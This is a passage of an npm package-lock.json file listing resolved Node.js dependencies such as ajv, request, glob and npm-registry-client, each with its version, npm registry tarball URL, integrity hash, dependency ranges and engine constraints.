"resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" 